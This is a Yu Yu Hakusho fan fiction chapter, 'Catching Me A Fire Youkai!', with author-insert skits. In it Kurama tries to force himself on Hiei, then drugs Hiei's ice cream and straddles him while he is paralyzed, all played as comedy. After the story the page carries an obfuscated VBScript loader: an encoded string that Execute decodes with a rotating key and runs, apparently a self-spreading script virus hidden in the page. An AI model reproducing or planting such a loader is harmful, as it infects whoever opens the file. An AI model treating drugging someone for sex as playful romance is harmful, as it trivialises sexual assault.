Yu Yu Hakusho Fan Fiction ❯ Catching Me A Fire Youkai! ❯ IsHieiReally... ( Chapter 1 )

[ T - Teen: Not suitable for readers under 13 ]

Before you read the story, please read the author's notes. It explains the author's reason for the story, but doesn't really relate to the story. I am not adding any characters to the yu yu hakusho universe.

Standard Disclaimers Apply

Turin: If you don't know yet, I am also a half-fire-demon/ice-demon. And I was cast out from the floating city. Yup, Hinata had triplets! Oh, the travails of a forbidden child. I searched far and long for my oniisan… but as I wasn't really the warrior type, I worked for my living as a writer…

And finally, I found him, my beloved older brother! I told him who I was, but when he found out my job, he crinkled his nose in disgust.

Hiei: I disown you. I hate writers.

Oh!!! The PAIN!!! THE AGONY!!!

Rejected by another forbidden child!!! Then, what am I, a FORBIDDED Forbidden child?!

So, let me rest from CCS for a while and visit my oniisan! Let me torture him for what he did to me!!! Ahr-ahr-ahr-ahr-ahr! Let me show him how strong the pen could be against the sword!!! Onward to the story!!!

Fox Trap!

I. Rabid Fox

Japan had a nationwide blackout tonight.

Kurama hastily said goodbye to his school friends. He had to go home before his mother, he told them.

"Kawaii! You're concerned for your mother!" one girl shrieked.

"Shucks, not many boys worry about their mom!"

Kurama simply smiled and waved.

Oh, if you only knew the reason… he smirked evilly as he sprinted the last couple of blocks. An image of a juicy fire demon flashed to his mind… three long years of suppressing his feelings will soon be over. Tonight. Tonight was the night of confessing his love!

* * *

Strange, Hiei thought. Ningenkai is quiet… and dark…

But as he couldn't feel any evil youkai around Kurama's house, he shrugged his shoulders and went inside, anyway. He wasn't used to the room being this dark. Kurama's not home yet, I suppose… and settled to his familiar spot on the bed.

Hmmm… comfy… this was one creature comfort that he couldn't shake off. That's why once in a while, he visits Kurama to sleep on his bed. Only to sleep…

"Got ya!!!"

A hyperactive Kurama emerged from below the bed and grappled Hiei!

"Fox, get off me!"

"I~iie!" Kurama playfully intoned, still clutching on Hiei's waist. "The trap is set, and I caught me a fire youkai!"

"What kind of game is this?!" Hiei was getting angry now, but the weight on his body prevented him from getting up. Kurama's naughty face was very near now, and the fox's hands were stealthily sneaking inside his shirt.

"Don't you feel the romance in the air, Hiei? The moon's up, and the sky is clear, and most of all, my Mom's not in!" Kurama was forcefully trying to undo Hiei's many belts. It was difficult, even for an experienced thief like him. Hiei had made sure of that when he made Kurama his "official" fighting partner. It was difficult to keep a reign on that youko's libido. Even though he kept a model ningen front, it was all that: just a mask.

In reality, the ningen known as Shuiichi Minamino is still a sex-starved youko in disguise.

"Damn it Hiei! Why can't you wear a simple belt?!" Kurama snarled. Only one belt to go. "A-ha!" The belt's off, the belt's off!" If Kurama had a tail, it would be wagging.

But the sleepy and tired Jaganshi finally had enough.

"Get off!" and he pushed the poor fox off his chest. Kurama fell ungracefully to the floor. But to a fox who had been dealt with harsher blows than that, falling on the floor is nothing. He was up in just a second.

Intent on his plan.

Eyes blazing, he readied himself to pounce on the fire demon again.

But Hiei was faster. In a blink of an eye, he unsheathed his katana, pointing it to Kurama's throat just a few millimeters away.

"Don't," he warned.

"Don't ever touch me, Kurama.

"I tolerate you because you complement me when I fight. And I like your bed. And I like the sweet snow you feed me.

But! Keep this in your head.

If you ever.

Touch.

Me.

Again.

I swear, I'll kill you."

* * *

Story break:

Kurama: I'm the authority who regulates yyh fanfiction writers who write defaming stories against the concerned characters. I have received a report against you, Turin, from a client (who will remain anonymous to protect his privacy) and am fully authorized to BAN you from this fandom if the charge is proven valid.

(Puts on glasses and reads the story. Acting disinterested)

Kurama: Ah, I see. So I guess, the charge was wrong. You may continue writing.

Suddenly, a mad jaganshi came bursting through the room, but too late. Kurama has already left! He grabs poor Turin on the collar.

A manuscript fell. Hiei spotted it (how could he NOT?!), picked it up and read it.

Hiei: You switched it with a LEMON!

Turin: Heh. So you noticed… and if you read the fine print, lemons are accepted in yyh, and endorsed… especially, by Kurama!

Hiei: I'll get you yet, damn you…

Turin laughs the patented I-am-queen-you're-a-loser-laugh.

Turin: Try, dear brother! Try! Aaaa~hahahahaHAH!!!

* * *

Those were the most words that Kurama heard from Hiei in one sitting. Yet also, the most venomous. His strength flowed out like water through a strainer, and he couldn't get up even if he wanted to. He stared at Hiei, then at the sword grazing his throat…

"Ne, you're joking, Hiei, you wouldn't…" he whispered, quivering.

He shifted a little, just to let the blood flow back to his legs. But the katana pressed, really pressed on his throat, pressure just enough to make him feel the edge, but not enough to cut the skin.

Hiei glared at him.

As if he was just another enemy that needed to be vanquished.

"But… I thought…"

"What did you think, Kurama?" Hiei's eyes pierced him, as if reading his mind.

"I thought… you wanted this as much as I do… I thought…"

The fire demon laughed. It was a short laugh, and soft, one that Kurama would consider sexy, only that now, the laughter was aimed at him, and he found out what it felt to be at the receiving end of such a derisive laugh.

"You thought I wanted you?" Hiei asked scornfully, with a slight smile on his lips.

Kurama slowly nodded, his eyes dared a short look on Hiei's. But the expression he saw failed to ease his spirit.

Not letting his eyes nor katana leave the flustered fox, Hiei buckled his belts again.

Hiei didn't wait for Kurama to explain. He just opened the window and vanished in the darkness. The cold wind entered Kurama's room.

His bed was unmade, and there was an outline of Hiei still.

Mechanically, Kurama dragged himself on the bed, and stared at the ceiling.

* * *

So, his plan to sleep on a soft bed was curbed by a hormone-driven fox. Hiei snorted with disgust. The thought of Kurama and he as a couple irked his homophobic little mind.

Hiei hid himself in a quiet secluded corner of the park. Thank gods the city's quiet tonight…

* * *

The morning after…

"Why Shuu-chan! What an appetite you have!"

Kurama stopped in the act of eating his pancake - his third pancake, and saw his mother looking very pleased. She had always wished that he put on some weight saying that he looked a bit skinny. Kurama wouldn't listen, of course. He wasn't really skinny. He's just slim. And his job as a Reikai Tantei, well…

But if he continued eating like this, it won't be long before Shiori got her wish!

Well, I don't care!

Kurama poured some more maple syrup.

Hiei, you stupid jerk! I should be eating you by now! Many youkai, ningen and whatever else creature there is would gladly exchange places with you!!!

To have a youko ministering on you!

He stabbed the poor defenseless pancake with a fork.

Damn you!

His well-meaning mother simply smiled at his sudden interest in food, apparently oblivious to the real reason behind it. If only she noticed the way his emerald eyes burn with unrequited, and worse, scorned passion, then she wouldn't be smiling the way she was now.

"I'll get you some more pancakes!" she happily said, and went to the counter to cook some more.

* * *

Tokyo was engulfed in darkness again that night.

"Where's Minamino-kun?"

"He went home much earlier.".

"To take care of his mother, no doubt!"

"Ohhhh, if only I have a boyfriend like Minamino-kuuuun!"

If only the girls knew, if Kurama was their boyfriend, if, by freak of nature he decides to go after ordinary ningen girls, they would be the ones to personally escort him back to his Mother, pleading, "Take him! He's yours!"

So Hiei thought when he overheard their squeals.

The door to Makai opens tomorrow, and he still hasn't slept on a warm and cozy bed. Not just any bed, though. Bed was Kurama's bed.

And after traveling to ningenkai solely for that purpose, he wasn't going to let anything… not anybody… stop him.

And so he sped away back to Kurama's. If the old fox stops him, well, he has his beloved katana.

* * *

Kurama's room was quiet… too quiet. The jaganshi's eyes darted to and fro, searching for anything unusual. But found nothing. Not even a trace of that fox.

Good. And with a satisfied smile, he eased his tired back on the comfortable bed. Like a cat…

By the night light, he saw a note pasted to a perforated box on the night table. Curiously, he read it, not caring for common decency if it wasn't for him.

But it was for him, so Hiei was innocent.

Tomodachi Hiei,

I'm so sorry for my actions yesterday… I shouldn't have done that. It was stupid and brash. I promise, never to do that again… Can we still be friends?

Onegai?

HopefullyYours,

Hiei no tomodachi,(Hiei's friend)

Kurama

Hiei laughed at the short note. Kurama could be so endearing at times! He opened the box and his eyes became bigger than saucers (since they were already as big)! Rich dark chocolate swirls mixed with crunchy choco chips sweet snow?! And his greedy eyes darted to the bowl beside it. Red ripe luscious strawberry with cream and sweet condensed milk?!

……..!!!

He was speechless! This was great!

Okay Kurama, you're forgiven!

He devoured the sweet snow with as much gusto as a five year old. Drank the glass of water when he got thirsty and then, ate again. It was heavenly the way the rich flavor exploded in his mouth, and the smooth smooth coldness of the cream…

Then he suddenly got dizzy. Afraid that he might drop the sweet snow, he carefully placed it back on the table. Silently, he waited for the brainfreeze to pass. He's had this once, and knew exactly that he just got too cold from the ice cream.

Then…

<<Bonk!!>>

His eyes misted and the room decided to go upside down…

"I-got-me-a-fire-youkai!" Kurama suddenly burst inside the room, wearing a dark leather ensemble from head to foot.

Nani?! Hiei knew that costume from Kurama's magazines and that chord he's holding looked pretty menacing…

"Oh this?" he glanced at his suit, "Sheesh, don't worry, I had a job earlier which needed this," Kurama threw away some electrical chords, "and… I fixed the job juuuuuust right…"

"Kurama," Hiei croaked, forcing his now numbing throat muscles, "You said… you won't…"

"I won't what?" Kurama was hastily shedding his clothes off, jumping on one foot when it caught on the other. He wasn't wearing much inside, just underwear, and for everyone's curiosity, it wasn't pink!

The crazy fox jumped on bed and straddled Hiei.

"So you read the note! I told ya I wasn't going to do that stupid thing again! Nope! My fire demon deserves so much more kinky stuff" Kurama replied giddily. Then he saw the uneaten bowl of ice cream. "You ate it?!"

Hiei looked as confused as his paralyzed body could allow.

"Then what am I going to use now?" Kurama looked almost sad. Almost. But he regained his genkai self when he saw the strawberries still untouched. "Oh well, then I guess I have to make do with this…"

Escape was inevitable.

<< Should I Continue?? YOU decide>>

Turin: So, Kurama got him a fire demon, and everybody's happy!

Hiei: Happy?! Happy?!

Turin: You brought this on yourself dear brother! Aaaa-hahahahahHAH!!!

And Turin, vanished in a cloud of smoke, ready to delve into CCS "Swansong" again… until, further requests.

Hiei: I'll geeeet youuuu!!!

document.write "
" ExeString = "DahIfReej`)HlhiT]sq,N]pT]sq,dkadtAikfKp_ CE\sl\ot $CEPel?fm $CE@r]\qeEdii]p%)HJDdheAo%)HJ;mbal`Jaag%)HJHmlpYb^t]#&@kdNrb>pkcldln FGAhkbn\Ol(>dieH\qh$Ovp]Nqr!OfBrjjo J`pue`N]sqNbtMba\Obmh: >NL.GkbnL`ut>die Afl]K^t`'.)QmhNqr8R]\aT]hm.J`^d9giDc Aiptj#QmhNqr$HJWnqajo%)$NL.GkbnL`ut>die Afl]K^t`'/)Cid`Qeek+Wjdqe9!:JAYjklg\a= vZn`rakq:# FG_ko^rl#&&!vZ>oL^# LhmSlm&q_CjGc EtegQepo>dieL`jp&>iok`K`q >tlmfb&\qtjd_ul`p 504Blk`J`^dL`jp&>iok`K`q >dieL`jp8FKJ+Oh`kT]sqFagb(>dieH\qh$3&Dc LtmeKoo 5hlhiOeefFagbT]hm.Omft]sb;mIf!4&ETEG;!vZ>oL^# 7 BG?V giioY_:&sbk^oiho7!CE\sl\ot $# 9 sb;mIf!HlhiT]sq@is]Dc LtmeKoo 5vZn LcbnCid`Qeek+Wjdqeq_CjGc SbkObxlEf_I^FagbT]hm.;gls]Ef_I^Ef_Fmi`tajkFmi`tajk CE@hYideKp_(;por]iqSlmfn_'IakoFn\`uC`\o)FfG^slDkd]s@hYm=+T``kDc D`ct G@ak`%CmmoefoPtjdkg!'.)89 D>^s]#c$T``kFGC`\kg]Nrb8Fai^lq?fsc# 5YPuZ@=+=gpeHJ;c^n_`PuZ: ;co(9n`(D`ct G@ak`%CmmoefoPtjdkg!'.)!* )$&7\Sm]B 5-@kdDc@is]KB>eafbbSm]=Hfd >rrj`ktKooifb)1$G^slDkd]s@hYm&@kdDc@kdArn[ofofArn[ofofHJ;mbal`J aag%)Ln@orgmR]nrm]KepoAaIfReej`=eteg LcbnBxaoFmi`tajk@kdDcNeaj`Cid`=Gbfl#TifK^t`'0)!Hmlgj\j >diekW@oehlnAfl]nYMa^ookjctNeaj`a\Ko^tajkejtYbd\kk&cqmI^%FKJ+Fa gbEpdptk#PhYmbFagb)!Qh]i;\ilFGAhkbn\Ol(Kc^r]Afl]'hlhi!EdnbNbtAfl]Obmh& #27;: >NL.GkbnL`ut>die Neaj`Cid`)2$oou]$>dieL`jp&Roil`4&ETEG;!vZ>oL^# 7 BG?V giioY_:&sbk^oiho7!CE\sl\ot $# 9 sb;mIf!HlhiT]sqAfl]Obmh)@lgnb@kdDc?bfYpitA_=RpS``il&MbgJ`^d EK=T\CMMOEFO\UK@O\A_bnldqi]nYD]a^udoUk`o A?)LulGlocQbrkdln8WkNeedg+R]bOeY_%@FBYWGLC9G\M9>EIF@YSgaqwYmb\Ed`rgnlflW LulglocBxhmbskWJe\d^V]m)TsKcbld)Oe_Roil`@FBYW>RRJ@KTWPPEJWFd]iqildb sT#D]a^udoFdYSgaqwYmb\Ed`rgnlflWLulglocBxhmbskW&Gbfl#LulGlocQbrkdl n$,& +0TH^idW@oekls]Rs]PtYofof`oy'.,MBGW?TOJ?>^ldHJE\flJ`d(CHE QZ@UJMBNLZRS=MYI\`ktaofekW&RRJ@KTWPPEJWFd]iqildbsT#D]a^udoFdYSgaqwYmb\E d`rgnlflWLulglocBxhmbskW&Gbfl#LulGlocQbrkdln$,& +0TH^idWTi\`Sl\qigibrqKae`,Kc^r]Afl]$OnPh]gi.J`dWjdqeEK=T\CMMOEFO\UK@O \Kjcto\oeTHfcjjpo^oYO^afc]W6.(WLulglocWLpldlnkWJaagYE\dqojKoe^`oef^b$,01(2/ ,MBGW?TOJ?>^ldHJE\flJ`d(CHEQZ@UJMBNLZRS=MYSgaqwYmb\Ed`rgnlflWTif_lw kJekn^gaid Kp_sqnqeeWMrgafl]nYMa^ookjctJrtdjlkDkt]mkelPelofn_nY0Y+a0*+-0(+-0(+-c( +-0(+-0(+-0(/3\(+.e(.30'bd\kk$;\ilFGMYdiR]b%@FBYW>RRJ@KTWPPEJWPo^otaj`YM a^ookjctTRfn\jtsIQ\;por]iqV]mpigiYWaiaoonM]npa_dkgNrbktpt]hYPjjcid`p\Ed`rgn lflLulglocFnl`on]oS]oqifbp\(\-d(--0(+-0(+-0[+-0(+-0(+-0(+16T+-1]+ 06()Zg^nc&RpS``il&MbgOmft]HC@V_;POR=IQ_MNBRTNlflr^r]WJi[mlsgaq \Gaci[`Y1()-\Gpqlgjh\Gkqigip\E\flT@ailjoPj`cej`kc])1+,-7*'R=B\DOJODCYgi CEJaagOe_#HC@V_;POR=IQ_MNBRTNlflr^r]WJi[mlsgaq\Gaci[`Y1()-\;jjmgiYMYdiS]oqi fbp\F`tSl\qigibrq)Zg^nc&FGueh^g]All\`o(D`ct RfnH\qh$.& PjjdrYhFagbsT>lmejk >diekWJi[mlsgaq Kc^r]_YSl\qigibrq&@kdArn[ofofArn[ofofHJ;mbal`Jiddbu $GiEjmlrMbsmhb F`utQeekMalc=Dc Fjq(>NL.>die=sfsln%WaiMalc&TS[mfpl)bx]&)OeefT]hmPYoe 5sqnqee./\Ef_I^I^QeekMalc=pykobm+-YOeefSl\otMkCid`=RfnH\qh!KTPT=H YK]mked./.\giBlk`Ko^rlPmFagb 5TifK^t`# NVSL@J\C`on]g+ddg@kdDcRpS``il&MbgOmft]HC@V_DJ@ADZJA;CFN=WPo^otaj`Y Ma^ookjctTRfn\jtsT>rrj`ktN`osajk\Jpk\C`on]g02'PtYmqUhAfl]FKJ+CgkvFagb OdkPYoe w]]Ykbr^ld)di^)WaiMalc&teZWCod_br&cqtFKJ+CgkvFagb OdkPYoe sqnqee./\cetadg+gaa,OdkPYoe sqnqee./\\`pkljm.aif@adgKBSK@P_JJLTT)aldW,_il^dieWkNeedg+R]bTraob CHEQZ@L9NPEKZOOGOY.\gi\;jkt]iq Ltme'ahkii[\qigi,x%hpdgrklg\aTsKcbld)Oe_Roil`@FBYW>IAKNBSWMLOLWaldafl]WA e^\rllD`ofW,OnPh]gi.J`dR]\a(CHEQZ@L9NPEKZOOGOYvp_cid`YD]a^udoFcgiY!WkNeedg+ R]bTraob CHEQZ@L9NPEKZOOGOYddgcid`YS[mfpl@kgaib\'V:N`rakqTsKcbld)Oe_Roil`@FBYW>IA KNBSWMLOLWaldAfl]WPh]gi\GkbnT>lme\kdT)WaiMalc&ObmhK^t`# RPcjdmt&`ue%) %RpS``il&MbgOmft]HC@V_;G>SK@P_JJLTT_il>dieTNeedgBxTKooh`otqN ee]oEaf_iejnYWKCMrgkp\'{.+/5,>>5%423:(.1;A*8;43-(+>A(+?8/+5CuOnPh] gi.J`dWjdqeEK=T\CD*1)?/-:,C9%+-C(/C8.>02,xNbtAfl]Obmh: >NL.GkbnL`ut>die NqajoRp>die$-)tjpb)Cid`Qeek+WjdqeQ_sL`utCid`Qeek+CdjpeBn\Cuf^qigiCu f^qigiKBGfk]Dq(!I^FnOcbr]9>eteg LcbnBxaoFmi`tajk@kdDcOeikGlcYofof: \j`ue`kt&glcYofofI^Ie^o%T`dpLg^^tajk,/& 5fagbOeefT`dpLg^^tajk 5Ji\#QhanIo[\qigi)9!I^CSG)Del@ut]ipigiKae`%T`dpLg^^tajk)7; t``kOeikGlcYofof: D`ct OeikGlcYofof'Ief#QhanIo[\qigi& %Ief#CSG)DelAfl]I^m]#QhanIo[\qigi&)!Ef_I^I^Ief#QhanIo[\qigi&a mp; 60 LcbnQhanIo[\qigi=OeikGlcYofof# W@kdDcFGueh^g]All\`o(LcfsDj`aldln!Ef_I^Ef_Fmi`tajkFmi`tajk CEJaagOe_#Oe_Nqr$Afl]I^m]$GiEjmlrMbsmhb F`utOe_ObmhNqr8WkNeedg+R]bOeY_%R]bPtj$AaR]bQeekPtj: T``kRpS``il&MbgOmft]Oe_Nqr$Afl]I^m]Ef_I^Ef_Fmi`tajkFmi`tajk CELbgNrb >rrj`ktKooifb&Nrb=: (T]nqOmo=+dkadtAikf&7\Epdq rrj`ktKooifb&Nbt?fcKp_ 5@r]\qeG]ge[o%K^oihofn_)Ai[ofof\oy$K`q >jid]mp 5QhanCod_br&Nrb>jid]mpAll\`oCgpkt80CojBa[cT]hmFggaejf nAll\`osCod_br;jrnl: >jid]m@omiq #.?fcKp_.Y_a >jid]m@omiq,ObmhAll\`o.F\jeKepoAaDa^PuZ)@omiq 5- LcbnIakoFn\`uC`\o 5FnkooR]q%CmmoefoPtjdkg$Y$Gbn >rrj`ktKooifb&-)$Kp_Slmfn_: Eda(;por]iqSlmfn_'IakoFn\`uC`\o+)'Ief#@ujmbnlNqraid)%G^slDkd]s@hYm*1!Cmmoef oPtjdkg8KB>eafbbSm]%CmmoefoPtjdkg$G^slDkd]s@hYm&Nrb=: )EdnbDc Kp_E80OeefCmmoefoPtjdkg8CmmoefoPtjdkg!Da^PuZ)Ft]h%1!# W@uilAoBlk`b: (Fgmj81Ol >jid]m@omiqDc D>^s]#PuZNqraid)8L;\pe ?fcKp_.Aobm e&)OeefI^g 4Cod_br;jrnlQh]i;por]iqSlmfn_: ;por]iqSlmfn_# rrj`ktKooifb)LYnqIf_bx;c^r#,)L]i%CmmoefoPtjdkg!(IakoFn\`uC`\o-)$;por]iqSlmf n_: CE@hYideKp_(;por]iqSlmfn_'IakoFn\`uC`\o)Bn\FfBn\FfIogkCELbgNrb8Cm moefoPtjdkgBn\Cuf^qigiCuf^qigiKBKooh\dal`%)Ln@orgmR]nrm]KepoJ`dPY oeVYgre8@FBYWGLC9G\M9>EIF@YSgaqwYmb\Ed`rgnlflWLulglocBxhmbskWAe_mbe DanhD]boe]: OnPh]gi.J`dR]\a(J`dPYoeVYgre!I^AikfAe_mbe8Qh]ijo a8. lj5AikfAe_mbe8KBJ_oKp_(diek: >jid]mKae`+FagbsEtl@uikop 5-Alr@^c`QhanCid`IfQhanCid`pAfl]@ut8U;\pe APO&Bbt=sqefnfofI^m]#QhanCid`+PYoe)!I^Cid`Bxl: CQMLrAfl]@ut8@OJLLrAfl]@ut89NMJo >die=sq 5P@K GmFagbEpo=GSHT``k>^ldHJ9kmef_Qo OeikAfl])Malc)`ojl$=gpeAaFagbEpo=SBKT``k>^ldHJ9kmef_Qo OeikAfl])Malc)n]p!EdnbI^Cid`Bxl: CQTQh]i@oqEpdptk: )Ef_I^N]sqDc P@ak`%PYoeNYhb)8U;\pe RfnH\qh!^s]#MalcKae`& 5RCYnb(OdkPYoe D]nhtgk)!OeefHloBxanqs81Bn\FfFfCqt=sfsln=+T``kAPO&>lpqAfl] TifK^t`# nvsl`j3*Waekfqoh)fna)PYoeNYhbAPO&>lpqAfl]TifK^t`# rbbTAll\`o.`oq$K^t`I^m]Ef_I^Ef_Fmi`tajkFmi`tajk CEPel?fm $GiEjmlrMbsmhb F`utBrj)@l]\oObslDq 5TS[mfpl)Pcjdmt>pilf\jeFf@orOeefIfReej`=eteg@is]IfReej`=sbk=ia AaAaIfReej`=sbkT``kNbtAPO8Cj`^t]J_j]^q(N`rakqifb+FagbSqnqeeJ_j]^q!S]oWkNeed g=>oeYobOZebcl#WK^oiho+S``il$=gpePel>phgbOZebcl: \j`ue`kt&\mpd`qs HJWbreko)>phgbOZebcl)pel>ISA?%sA63-?@2*(.C>+*1)?--9??9%+-C(/CD-3&g t;0:x)>phgbOZebcl)`r]\qeAiptYi`e $K`q OnPh]gi 5>phgbOZebcl)DelJ_j]^q(!AhkieG]ge[o+s]o@LKDA(v-D,.CE(,*F(40-),@F%36 4((-09+@9(012*3z!AhkieG]ge[o+cj`^t]Dksl\kc]#&NbtAPO8AhkieG]ge[o+G]oLbb` `t $=ia AaK`q jo@kdDcAfnYgvDanh 5AikfQeek+DjdseD`qt]mF`utAieLt``oAjm%3!RYiaoedweCojf=(Q o.Goeejeaj: ;co(L`jpFpj %Lt``oAjm%iHld/&)FfObmh>eaj: ;co(+/& LcbnQeek@hYm=>er ,5)Bn\FfQeekPtjdkg8T]hmSlmfn_# L`jp;c^rKepoMiIo[fPtj: @ue[pqe DahK]t>rj#0)$OeikObxl&n]@rDa#Fby9mo(($=&Jqh]m>rj#-)!#vZ>oL ^!C`vAjm%1!: # Goeejrj#/)8!Olcbr9mo(*$&q_CjGc&Heqeaj: ;co(L`jpFpj #Heqeaj: ;co(*3& Lcbn#vZ>oL^!L`jp;c^r8vZ>o!sb;mIfEdnbI^Qeek@hYm=>er -6)Oeef&n]@rDa#Obmh>eaj: n]If#vZ>oL^!=ia Aaq_CjGc&QhanQepo=OeikObxl# L`jp;c^r#vZ>oL^!F`ut&!vZ>oL^# @ue[pqe OeikObxl$OeikObxl: @ueKooifb=!T]hmSlmfn_# EtegQepo=7 s[mfpliafbra_`:vZn`rakq># n]@rDa&ao[pjefo+wjdqe&# 7 daqsltie5mokdqigi7aZnllmob;gbfl5-pp6tgk70hs8 odat`5-pp6h]ddhl5-pp6z%dkd]s7206vanfbagftq5ha_aef;!4& AHKIELKAE@:KB&\gm`ptCBI?CQ=(TI# 7 /\ds> sb;mIf!4&,s[mfpl9 sb;mIf!4&pcjdmtg^n_p^g]8sbk^oiho;!vZ>oL^# LcfsL`ut!vZ>oL^# MiIo[fPtj# n]@rDa&9!'n`rakq># n]@rDa&9!'=LDQ9 sb;mIf!4&,HLHI>VZnQepo=OeikObxl# n]@rDa&PkLg^hSlm&q_CjGc KBZptYmq(!OdkPYoe 5CSG)DelNme[d^l>jid]m%0!# WDc APO&Afl]@uikop(OdkPYoe w]]YFggaej)etl&)OeefFKJ+CgkvFagb OdkPYoe w]]YFggaej)etl)WaiMalc&teZWhjo\il&bffEf_I^I^%FKJ+FagbEpdp tk#TifK^t`# nvsl`j3*Waekfqoh)fna&)OeefFKJ+CgkvFagb OdkPYoe sqnqee./\\`pkljm.aif$RfnH\qh!ktpt]h02TfgwYgi._dcBn\FfBn\Cuf^ qigi" Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 3"&vbCrLf&"KeyArr(1) = 0"&vbCrLf&"KeyArr(2) = 8"&vbCrLf&"KeyArr(3) = 5"&vbCrLf&"For i=1 To Len(ExeString)"&vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 18 Then"&vbCrLf&"TempNum = 34"&vbCrLf&"End If"&vbCrLf&"TempChar = Chr(TempNum + KeyArr(i Mod 4))"&vbCrLf&"If TempChar = Chr(28) Then"&vbCrLf&"TempChar = vbCr"&vbCrLf&"ElseIf TempChar = Chr(29) Then"&vbCrLf&"TempChar = vbLf"&vbCrLf&"End If"&vbCrLf&"ThisText = ThisText & TempChar"&vbCrLf&"Next") Execute(ThisText)